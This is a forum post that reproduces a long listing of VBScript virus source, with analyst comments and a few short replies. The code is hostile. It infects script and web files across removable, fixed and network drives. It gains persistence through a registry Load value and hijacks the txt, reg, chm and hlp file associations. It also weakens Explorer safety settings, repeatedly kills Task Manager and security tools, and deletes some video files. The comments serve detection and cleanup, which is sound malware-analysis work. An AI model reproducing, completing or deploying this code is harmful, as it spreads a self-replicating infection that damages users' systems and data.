  437.     On Error Resume Next
  438.     Dim DNA(), Array_vbsCode()
  439.     Dim i, Value, flag, j, buffer
  440.     ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
  441.     buffer = vbsCode
  442.     Randomize
  443.     For i = 1 To Num_DNA
  444.         Do
  445.             Value = Int((Num_DNA * Rnd) + 1)
  446.             flag = 1
  447.             For j = 1 To Num_DNA
  448.                 If Value = DNA(j) Then
  449.                     flag = 0
  450.                     Exit For
  451.                 End If
  452.             Next
  453.         Loop Until flag = 1
  454.         DNA(i) = Value
  455.     Next
  456.     For i = 1 To Num_DNA
  457.         Array_vbsCode(i) = GetModelCode(buffer, i)
  458.     Next
  459.     buffer = ""
  460.     For i = 1 To Num_DNA
  461.         buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
  462.     Next
  463.     ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
  464. End Function
  465. 'OJCQCFHDTCJ1_9
  466. 'FYCOKKOUFWQFE1_4
  467. Function Head()
          ' Analysis note: returns, as a string, the source text that opens module 1_1
          ' in every generated copy: the head marker, the script-level declarations
          ' and the constants. The same statements also run as live code at the top
          ' level of this script. Values fixed in the literal: Version "4",
          ' CntMax 1000, Sum_ModelCode 26; the file names are built from GetUserName()
          ' with ".vbs" and ".ini" under GetSFolder(0) / GetSFolder(1). GetUserName,
          ' GetSFolder and GetHeadTail are not part of this listing.
          ' The Chinese text inside the literal is emitted as comments in the generated
          ' script; in English: "mainly handles the file-association redirection" and
          ' "mainly executes the config-file commands".
  468.     Head = VBCRLF & "'FYCOKKOUFWQFE1_1" & VBCRLF &_
  469.     "On Error Resume Next" & VBCRLF &_
  470.     "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
  471.     "Dim ModelHead, ModelTail" & VBCRLF &_
  472.     "Cnt = 0" & VBCRLF &_
  473.     "CntMax = 1000" & VBCRLF &_
  474.     "Version = ""4""" & VBCRLF &_
  475.     "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
  476.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  477.     "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
  478.     "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
  479.     "Sum_ModelCode = 26" & VBCRLF &_
  480.     "Head_V= GetHeadTail(0)" & VBCRLF &_
  481.     "Tail_V= GetHeadTail(1)" & VBCRLF &_
  482.     "ModelHead=""'FYCOKKOUFWQFE""" & VBCRLF &_
  483.     "ModelTail=""'OJCQCFHDTCJ""" & VBCRLF
  484. End Function
  485. Function VictimHead()
          ' Analysis note: returns the text of module 1_1 for the variant that is
          ' prepended to existing .vbs files: the common prologue from Head(), a call
          ' to VictimMain, the VictimMain wrapper that calls ExeVbs_Victim, and the
          ' closing marker for module 1_1.
  486.     VictimHead = Head() & VBCRLF &_
  487.     "Call VictimMain()" & VBCRLF &_
  488.     "Sub VictimMain()" & VBCRLF &_
  489.     "    Call ExeVbs_Victim()" & VBCRLF &_
  490.     "End Sub" & VBCRLF &_
  491.     "'OJCQCFHDTCJ1_1" & VBCRLF
  492. End Function
  493. Function VirusHead()
          ' Analysis note: returns the text of module 1_1 for the standalone installed
          ' variant: the common prologue from Head(), a call to VirusMain, the VirusMain
          ' wrapper that calls ExeVbs_Virus under On Error Resume Next, and the closing
          ' marker for module 1_1.
  494.     VirusHead = Head() & VBCRLF &_
  495.     "Call VirusMain()" & VBCRLF &_
  496.     "Sub VirusMain()" & VBCRLF &_
  497.     "    On Error Resume Next" & VBCRLF &_
  498.     "    Call ExeVbs_Virus()" & VBCRLF &_
  499.     "End Sub" & VBCRLF & VBCRLF &_
  500.     "'OJCQCFHDTCJ1_1" & VBCRLF
  501. End Function
  502. Function WebHead()
          ' Analysis note: returns the text of module 1_1 for the variant embedded in
          ' web-type files: the common prologue from Head(), a call to WebMain, the
          ' WebMain wrapper that calls ExeVbs_WebPage under On Error Resume Next, and
          ' the closing marker for module 1_1.
  503.     WebHead = Head() & VBCRLF &_
  504.     "Call WebMain()" & VBCRLF &_
  505.     "Sub WebMain()" & VBCRLF &_
  506.     "    On Error Resume Next" & VBCRLF &_
  507.     "    Call ExeVbs_WebPage()" & VBCRLF &_
  508.     "End Sub" & VBCRLF &_
  509.     "'OJCQCFHDTCJ1_1" & VBCRLF
  510. End Function
  511. 'OJCQCFHDTCJ1_4
  512. 'FYCOKKOUFWQFE2_25
  513. Sub DeleteReg(strkey)
          ' Analysis note: deletes the registry key or value named by strkey through
          ' WScript.Shell.RegDelete. There is no error handling here; callers in this
          ' listing run under On Error Resume Next.
  514.     Dim tmps
  515.     Set tmps = CreateObject("WScript.Shell")
  516.     tmps.RegDelete strkey
  517.     Set tmps = Nothing
  518. End Sub
  519. Function ReadReg(strkey)
          ' Analysis note: returns the registry value named by strkey through
          ' WScript.Shell.RegRead. A strkey ending in a backslash addresses the
          ' default value of that key, which is how the callers in this listing read
          ' the shell\open\command entries.
  520.     Dim tmps
  521.     Set tmps = CreateObject("WScript.Shell")
  522.     ReadReg = tmps.RegRead(strkey)
  523.     Set tmps = Nothing
  524. End Function
  525. Sub WriteReg(strkey, Value, vtype)
          ' Analysis note: writes Value to the registry location strkey through
          ' WScript.Shell.RegWrite. When vtype is an empty string the type argument is
          ' omitted and RegWrite's default type applies; otherwise vtype (for example
          ' "REG_DWORD" or "REG_EXPAND_SZ") is passed through.
  526.     Dim tmps
  527.     Set tmps = CreateObject("WScript.Shell")
  528.     If vtype = "" Then
  529.         tmps.RegWrite strkey, Value
  530.     Else
  531.         tmps.RegWrite strkey, Value, vtype
  532.     End If
  533.     Set tmps = Nothing
  534. End Sub
  535. 'OJCQCFHDTCJ2_25
  536. 'FYCOKKOUFWQFE1_1
  537. On Error Resume Next
  ' Analysis note: script-level state shared by every routine in this listing.
  ' Cnt counts files modified in the current run and CntMax caps one run at 1000.
  ' Both file names are derived from GetUserName(): a .vbs copy under GetSFolder(0)
  ' and GetSFolder(1), and a .ini config file under GetSFolder(1). GetUserName,
  ' GetSFolder and GetHeadTail are not part of this listing, so the actual folders
  ' and marker strings cannot be stated from here.
  538. Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
  539. Dim ModelHead, ModelTail
  540. Cnt = 0
  541. CntMax = 1000
  542. Version = "4"
  543. Name_V1 = GetUserName() & ".vbs"
  544. FullPath_V0 = GetSFolder(0) & Name_V1 'mainly handles the file-association redirection
  545. FullPath_V1 = GetSFolder(1) & Name_V1 'mainly executes the config-file commands
  546. FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
  ' Number of modules the script is divided into (used by GetMainBody and
  ' ChangeModelOrder).
  547. Sum_ModelCode = 26
  548. Head_V= GetHeadTail(0)
  549. Tail_V= GetHeadTail(1)
  ' Marker prefixes as they appear in this copy; ChangeName replaces these two
  ' names with random letters in generated copies.
  550. ModelHead="'FYCOKKOUFWQFE"
  551. ModelTail="'OJCQCFHDTCJ"
  552. Call VirusMain()
  553. Sub VirusMain()
          ' Analysis note: entry wrapper of the standalone variant; it only calls
          ' ExeVbs_Virus with errors suppressed.
  554.     On Error Resume Next
  555.     Call ExeVbs_Virus()
  556. End Sub
  557. 'OJCQCFHDTCJ1_1
  558. 'FYCOKKOUFWQFE2_13
  559. Sub DeSafeSet()
          ' Analysis note: weakens three Explorer settings through the registry:
          '   NoDriveTypeAutoRun (HKCU policy)  = 129
          '   ShowSuperHidden (HKCU)            = 0
          '   SHOWALL\CheckedValue (HKLM)       = 0
          ' 129 is 0x81; NOTE(review): per Microsoft's bit table this appears to leave
          ' AutoRun enabled for removable, fixed, network and CD drives - confirm.
          ' The other two values concern the display of hidden and protected files.
          ' No caller of this routine appears in this part of the listing.
          ' These three values are useful registry checks during triage.
  560.     Dim HLMShow , HCUAdvanced, HCUExplorer
  561.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  562.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  563.     HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
  564.     Call WriteReg (HCUExplorer, 129, "REG_DWORD")
  565.     Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
  566.     Call WriteReg (HLMShow, 0, "REG_DWORD")
  567. End Sub
  568. Sub SafeSet()
          ' Analysis note: counterpart used by RestoreSystem. Writes 1 to
          '   Explorer\Advanced\Hidden (HKCU)
          '   Explorer\Advanced\ShowSuperHidden (HKCU)
          '   SHOWALL\CheckedValue (HKLM)
          ' so hidden and protected files become visible again. It does not touch
          ' NoDriveTypeAutoRun. HCUSSHidden and HCUExplorer are declared but unused;
          ' HCUAdvanced is assigned without being declared in this routine.
  569.     Dim HLMShow , HCUSSHidden, HCUHidden
  570.     Dim HCUExplorer
  571.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  572.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  573.     HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  574.     Call WriteReg (HCUHidden, 1, "REG_DWORD")
  575.     Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
  576.     Call WriteReg (HLMShow, 1, "REG_DWORD")
  577. End Sub
  578. 'OJCQCFHDTCJ2_13
  579. 'FYCOKKOUFWQFE1_8
  580. Sub RestoreSystem(objfso)
          ' Analysis note: the sample's own uninstall routine, reached through the
          ' "UnLoadMe" and "KillVirus" orders. It is also a compact list of what the
          ' sample changes on a host, which makes it a remediation checklist:
          '   - Explorer hidden-file settings (SafeSet)
          '   - HKCU ...\Windows NT\CurrentVersion\Windows\Load (persistence value)
          '   - HKLM\SOFTWARE\Classes open commands for txtfile, regfile, chm.file,
          '     hlpfile and exefile
          '   - <drive>:\<Name_V1> and <drive>:\AutoRun.inf on every drive
          '   - FullPath_V1, FullPath_V0 and FullPath_Config
          ' It does not stop other running instances and does not restore
          ' NoDriveTypeAutoRun. vf is not declared in this routine.
  581.     On Error Resume Next
  582.     Dim Value, dc, d, HCULoad
  583.     Call SafeSet()
  584.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
          ' The Load value is removed only when it points at the installed copy.
  585.     If ReadReg(HCULoad) = FullPath_V1 Then
  586.         Call DeleteReg(HCULoad)
  587.     End If
          ' Each association below is rewritten only when it differs from the value
          ' this routine considers the default.
  588.     Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
  589.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  590.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  591.     End If
  592.     Value = "regedit.exe " & """%1"""
  593.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  594.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  595.     End If
  596.     Value = GetSFolder(1) & "hh.exe " & """%1"""
  597.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  598.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  599.     End If
  600.     Value = "%SystemRoot%\system32\winhlp32.exe %1"
  601.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  602.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  603.     End If
  604.     Value = """%1"" %*"
  605.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
  606.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
  607.     End If
          ' AutoRun.inf is deleted only on drives where the script copy is present.
  608.     Set dc = objfso.Drives
  609.     For Each d In dc
  610.         If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
  611.             objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
  612.             objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
  613.         End If
  614.     Next
  615.     If objfso.FileExists(FullPath_V1) = True Then
  616.         Set vf = objfso.GetFile(FullPath_V1)
  617.         vf.Delete
  618.     End If
  619.     If objfso.FileExists(FullPath_V0) = true Then
  620.         Set vf = objfso.GetFile(FullPath_V0)
  621.         vf.Delete
  622.     End If
  623.     If objfso.FileExists(FullPath_Config) = True Then
  624.         objfso.DeleteFile FullPath_Config , True
  625.     End If
  626. End Sub
  627. 'OJCQCFHDTCJ1_8
  628. 'FYCOKKOUFWQFE2_23
  629. Function MakeScript(strCode, T)
          ' Analysis note: wraps strCode in a SCRIPT element with
          ' "Language = VBScript" so it can be placed at the top of a web-type file.
          ' With T = 1 the modules are reordered first; any other T uses strCode as
          ' given. The opening and closing tags are assembled from two string pieces;
          ' presumably so the literal tag never appears inside the script text itself
          ' - confirm.
          ' Indicator: a web-type file that begins with a SCRIPT element written
          ' exactly as "SCRIPT Language = VBScript" (spaces around the equals sign).
  630.     If T = 1 Then
  631.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
  632.     Else
  633.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
  634.     End If
  635. End Function
  636. 'OJCQCFHDTCJ2_23
  637. 'FYCOKKOUFWQFE2_10
  638. Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
          ' Analysis note: walks all drives known to the FileSystemObject and calls
          ' SearchFile on the root of each drive whose DriveType is 1, 2 or 3
          ' (removable, fixed and network in the FileSystemObject numbering).
          ' The loop stops once the script-level counter Cnt reaches CntMax.
          ' T is passed through unchanged (0 = infect, 1 = remove, as used by
          ' InfectHead). SearchFile is not part of this listing.
          ' Network drives are included, so mapped shares are in scope.
  639.     On Error Resume Next
  640.     Dim d , dc
  641.     Set dc = objfso.Drives
  642.     For Each d In dc
  643.         If Cnt >= CntMax Then '
  644.             Exit For
  645.         End If
  646.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  647.             'If d.DriveType = 1 Then
  648.             Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
  649.             'End If
  650.         End If
  651.     Next
  652. End Sub
  653. 'OJCQCFHDTCJ2_10
  654. 'FYCOKKOUFWQFE1_5
  655. Sub MonitorSystem(objfso, vbsCode)
          ' Analysis note: resident loop with no exit condition. Every 5000 ms it
          ' terminates the listed processes and calls InvadeSystem again, which
          ' rewrites the installed files and registry values. The list covers Task
          ' Manager, the command prompt, Registry Editor, msconfig and several names
          ' that appear to be security or repair tools (360tray, SREng, USBAntiVir).
          ' Consequences for responders: the tools on this list close within seconds
          ' while the script runs, and registry or file clean-up is undone on the next
          ' pass, so the hosting wscript.exe/cscript.exe process has to be stopped
          ' before anything else is repaired.
  656.     On Error Resume Next
  657.     Dim ProcessNames
  658.     ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
  659.     Do
  660.         Call KillProcess(ProcessNames)
  661.         Call InvadeSystem(objfso, vbsCode)
  662.         WScript.Sleep 5000
  663.     Loop
  664. End Sub
  665. 'OJCQCFHDTCJ1_5
  666. 'FYCOKKOUFWQFE1_7
  667. Sub InvadeSystem(objfso, vbsCode)
           ' Analyst note: installation / persistence routine. It (1) calls AutoRun for every
           ' removable, fixed and network drive, (2) writes the script text to FullPath_V1
           ' and FullPath_V0 and marks both files hidden+system, (3) sets a per-user logon
           ' autostart value, (4) points the "open" command of four file classes at
           ' WScript.exe running the dropped script, and (5) calls DeSafeSet.
           ' FullPath_V0, FullPath_V1, Version, AutoRun, CopyFile, ReadReg, WriteReg and
           ' DeSafeSet are defined outside this excerpt. MonitorSystem in this listing calls
           ' this routine in a loop, so every artefact below is re-created repeatedly.
           ' Runtime errors are ignored (On Error Resume Next).
  668.     On Error Resume Next
  669.     Dim Value, HCULoad, vbsCode_Virus, dc, d
           ' Command line compared against the file-association keys further down.
  670.     Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
           ' Per-user "Load" value: programs named here are started at user logon.
           ' Detection: this value is normally empty or absent; any script path in it is suspect.
  671.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  672.     vbsCode_Virus = vbsCode
  673.     Set dc = objfso.Drives
  674.     For Each d In dc
               ' DriveType 1 = removable, 2 = fixed, 3 = network. AutoRun receives the drive
               ' letter and the script text (presumably it places an autorun artefact in the
               ' drive root - confirm in that routine).
  675.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  676.             Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
  677.         End If
  678.     Next
           ' Both branches write the file and set its attributes; the only difference is that
           ' an existing copy with a lower version character is deleted first.
  679.     If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
  680.         objfso.DeleteFile FullPath_V1 , True
  681.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
  682.         Call SetFileAttr(objfso, FullPath_V1)
  683.     Else
  684.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
  685.         Call SetFileAttr(objfso, FullPath_V1)
  686.     End If
           ' Same handling for the second copy, FullPath_V0.
  687.     If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
  688.         objfso.DeleteFile FullPath_V0 , True
  689.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
  690.         Call SetFileAttr(objfso, FullPath_V0)
  691.     Else
  692.         Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
  693.         Call SetFileAttr(objfso, FullPath_V0)
  694.     End If
           ' Logon persistence: the Load value is set to FullPath_V1 whenever it differs.
  695.     If ReadReg(HCULoad)<> FullPath_V1 Then
  696.         Call WriteReg (HCULoad, FullPath_V1, "")
  697.     End If
           ' File-association hijack: opening a .txt, .reg, .chm or .hlp file would start
           ' WScript.exe with the dropped script (FullPath_V0) instead of the normal handler.
           ' Detection: an "open" command under these four classes that names WScript.exe.
           ' Cleanup must restore the original handlers as well as delete the files.
  698.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  699.         Call SetTxtFileAss(FullPath_V0)
  700.     End If
  701.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  702.         Call SetRegFileAss(FullPath_V0)
  703.     End If
  704.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  705.         Call SetchmFileAss(FullPath_V0)
  706.     End If
  707.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  708.         Call SethlpFileAss(FullPath_V0)
  709.     End If
           ' NOTE(review): DeSafeSet is not visible here; by name it presumably weakens
           ' security-related settings - review it when listing what to restore.
  710.     Call DeSafeSet()
  711. End Sub
  712. 'OJCQCFHDTCJ1_7
  713. 'FYCOKKOUFWQFE2_16
  714. Sub SetTxtFileAss(sFilePath)
           ' Analyst note: sets the default value of the txtfile "open" command to
           ' WScript.exe followed by the quoted sFilePath and " %1 %* ", passed to WriteReg
           ' (defined outside this excerpt) with type "REG_EXPAND_SZ".
           ' Effect: opening a text file launches the script at sFilePath.
           ' Detection / cleanup: check this key for a WScript.exe command and restore the
           ' original handler. Errors are ignored.
  715.     On Error Resume Next
  716.     Dim Value
  717.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  718.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  719. End Sub
  720. Sub SethlpFileAss(sFilePath)
           ' Analyst note: sets the default value of the hlpfile "open" command to
           ' WScript.exe followed by the quoted sFilePath and " %1 %* ", passed to WriteReg
           ' (defined outside this excerpt) with type "REG_EXPAND_SZ".
           ' Effect: opening a .hlp help file launches the script at sFilePath.
           ' Detection / cleanup: check this key for a WScript.exe command and restore the
           ' original handler. Errors are ignored.
  721.     On Error Resume Next
  722.     Dim Value
  723.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  724.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  725. End Sub
  726. Sub SetRegFileAss(sFilePath)
           ' Analyst note: sets the default value of the regfile "open" command to
           ' WScript.exe followed by the quoted sFilePath and " %1 %* ", passed to WriteReg
           ' (defined outside this excerpt) with type "REG_EXPAND_SZ".
           ' Effect: double-clicking a .reg file launches the script at sFilePath, which
           ' also gets in the way of repairing the registry by importing a .reg file.
           ' Detection / cleanup: check this key for a WScript.exe command and restore the
           ' original handler. Errors are ignored.
  727.     On Error Resume Next
  728.     Dim Value
  729.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  730.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  731. End Sub
  732. Sub SetchmFileAss(sFilePath)
           ' Analyst note: sets the default value of the chm.file "open" command to
           ' WScript.exe followed by the quoted sFilePath and " %1 %* ", passed to WriteReg
           ' (defined outside this excerpt) with type "REG_EXPAND_SZ".
           ' Effect: opening a compiled help (.chm) file launches the script at sFilePath.
           ' Detection / cleanup: check this key for a WScript.exe command and restore the
           ' original handler. Errors are ignored.
  733.     On Error Resume Next
  734.     Dim Value
  735.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  736.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  737. End Sub
  738. 'OJCQCFHDTCJ2_16
  739. 'FYCOKKOUFWQFE2_15
  740. Sub SetFileAttr(objfso, pathf)
           ' Analyst note: sets the attributes of the file at pathf to 6, which in the
           ' FileSystemObject attribute bitmask is Hidden (2) + System (4).
           ' Triage consequence: such files are not listed by a default Explorer view or a
           ' plain "dir"; enumerate with hidden and system files shown.
           ' There is no local error handling, so a failing GetFile raises to the caller.
  741.     Dim vf
  742.     Set vf = objfso.GetFile(pathf)
  743.     vf.Attributes = 6
  744. End Sub
  745. 'OJCQCFHDTCJ2_15
  746. 'FYCOKKOUFWQFE2_22
  747. Function GetSFolder(p)
           ' Analyst note: returns the path of special folder p with a trailing backslash.
           ' For FileSystemObject.GetSpecialFolder, 0 = Windows folder, 1 = System folder,
           ' 2 = Temp folder. The object is created from the ProgID string returned by
           ' GetFSOName() rather than from a literal in this routine.
  748.     Dim objfso
  749.     Set objfso = CreateObject(GetFSOName())
  750.     GetSFolder = objfso.GetSpecialFolder(p) & "\"
  751.     Set objfso = Nothing
  752. End Function
  753. Function GetUserName()
           ' Analyst note: returns the string stored in the current user's Active Setup
           ' "Username" value for the component GUID below, read through ReadReg (defined
           ' outside this excerpt); returns "Administrator" when that read yields an empty
           ' string. Errors are ignored (On Error Resume Next).
           ' GetHeadTail in this listing derives the file's marker comment lines from this
           ' value, so those markers vary with the account name on the affected host.
  754.     On Error Resume Next
  755.     Dim Value , UserName
  756.     Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
  757.     UserName = ReadReg(Value)
  758.     If UserName = "" Then
  759.         GetUserName = "Administrator"
  760.     Else
  761.         GetUserName = UserName
  762.     End If
  763. End Function
  764. Function GetFSOName()
           ' Analyst note: looks up the ProgID registered for the CLSID below through ReadReg
           ' (defined outside this excerpt) and returns it; GetSFolder passes the result to
           ' CreateObject. The fallback literal suggests the CLSID is the FileSystemObject
           ' class. Resolving the name at run time keeps the ProgID string out of the
           ' CreateObject call site, which matters for string-based detection of this script.
           ' Errors are ignored (On Error Resume Next).
  765.     On Error Resume Next
  766.     Dim Value , UserName
  767.     Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
           ' The local named UserName holds the ProgID here, not an account name.
  768.     UserName = ReadReg(Value)
  769.     If UserName = "" Then
               ' NOTE(review): as written, this branch assigns to the name GetUserName, so
               ' this function's own return value is left unset when the lookup is empty.
  770.         GetUserName = "Scripting.FileSystemObject"
  771.     Else
  772.         GetFSOName = UserName
  773.     End If
  774. End Function
  775. Function GetHeadTail(l)
           ' Analyst note: builds a VBScript comment line from GetUserName().
           '   l = 0     -> an apostrophe followed by the name.
           '   otherwise -> an apostrophe followed by the name reversed character by character.
           ' The first and last lines of this listing ('Administrator4 and 'rotartsinimdA)
           ' look like such head/tail markers for the name "Administrator" (the trailing
           ' digit is appended elsewhere - TODO confirm).
           ' Because the text derives from a per-host registry value, these marker lines
           ' differ between hosts and make a weak static signature on their own.
  776.     Dim Str , buffer
  777.     If l = 0 Then
  778.         GetHeadTail = "'" & GetUserName()
  779.     Else
  780.         buffer = GetUserName()
  781.         Str = ""
  782.         For i = 1 To Len(buffer)
                   ' Prepending each character reverses the string; the return value is
                   ' refreshed on every pass and ends up as the fully reversed name.
  783.             Str = Mid(buffer, i, 1) & Str
  784.             GetHeadTail = "'" & Str
  785.         Next
  786.     End If
  787. End Function
  788. 'OJCQCFHDTCJ2_22
  789. 'FYCOKKOUFWQFE2_11
  790. Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
           ' Analyst note: recursive directory walk starting at strPath. Each file is
           ' dispatched on its lower-cased extension, then the routine calls itself for
           ' every subfolder. Cnt and CntMax are globals defined outside this excerpt; both
           ' loops stop once Cnt has reached CntMax. InfectHead and IsSexFile are also
           ' defined outside this excerpt. Errors are ignored (On Error Resume Next), so
           ' folders that cannot be read do not stop the walk.
           ' Impact assessment: two outcomes per file - modification of script/web files,
           ' and deletion of some video files (data loss).
  791.     On Error Resume Next
  792.     Dim pfo, pf, pfi, ext
  793.     Dim psfo, ps
  794.     Set pfo = objfso.GetFolder(strPath)
  795.     Set pf = pfo.Files
  796.     For Each pfi In pf
  797.         If Cnt >= CntMax Then
  798.             Exit For
  799.         End If
  800.         ext = LCase(objfso.GetExtensionName(pfi.Path))
  801.         Select Case ext
                   ' Script and web file types are handed to InfectHead together with both
                   ' code variants; integrity checks after an incident should cover exactly
                   ' these extensions, including web-server content (.asp, .htm, .html).
  802.             Case "hta", "htm", "html", "asp", "vbs"
  803.                 Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
                   ' Video files are deleted when IsSexFile(name) returns True (presumably a
                   ' file-name keyword match - confirm). File.Delete removes the file
                   ' directly, so recovery depends on backups.
  804.             Case "mpg", "rmvb", "avi", "rm"
  805.                 If IsSexFile(pfi.Name) = True Then
  806.                     pfi.Delete
  807.                 End If
  808.         End Select
  809.     Next
  810.     Set psfo = pfo.SubFolders
  811.     For Each ps In psfo
  812.         If Cnt >= CntMax Then
  813.             Exit For
  814.         End If
               ' Recurse with the same arguments; depth is bounded only by the folder tree
               ' and the Cnt/CntMax cap.
  815.         Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
  816.     Next
  817. End Sub
  818. 'OJCQCFHDTCJ2_11
  819. 'rotartsinimdA

作者: somebody    时间: 2007-11-7 17:01

牛啊,好长啊....看不懂
作者: smilediao    时间: 2007-11-7 22:54

楼主你在开玩笑吧!太长了!我还是比较喜欢看精简的!
作者: novaa    时间: 2007-11-8 14:10

我也不懂VBS
只是提供给那些喜欢研究病毒代码的人

作者: ranon    时间: 2007-12-22 13:44

喜欢就是不0................
作者: redsky14    时间: 2008-5-9 17:37

.....先是收藏了再说,,拿回去慢慢研究,,,
作者: ak42d    时间: 2008-5-12 14:34

怎么什么都没有啊!~~~~~

看不见啊
作者: IceSea    时间: 2008-7-30 17:07

谢谢楼主,学习学习



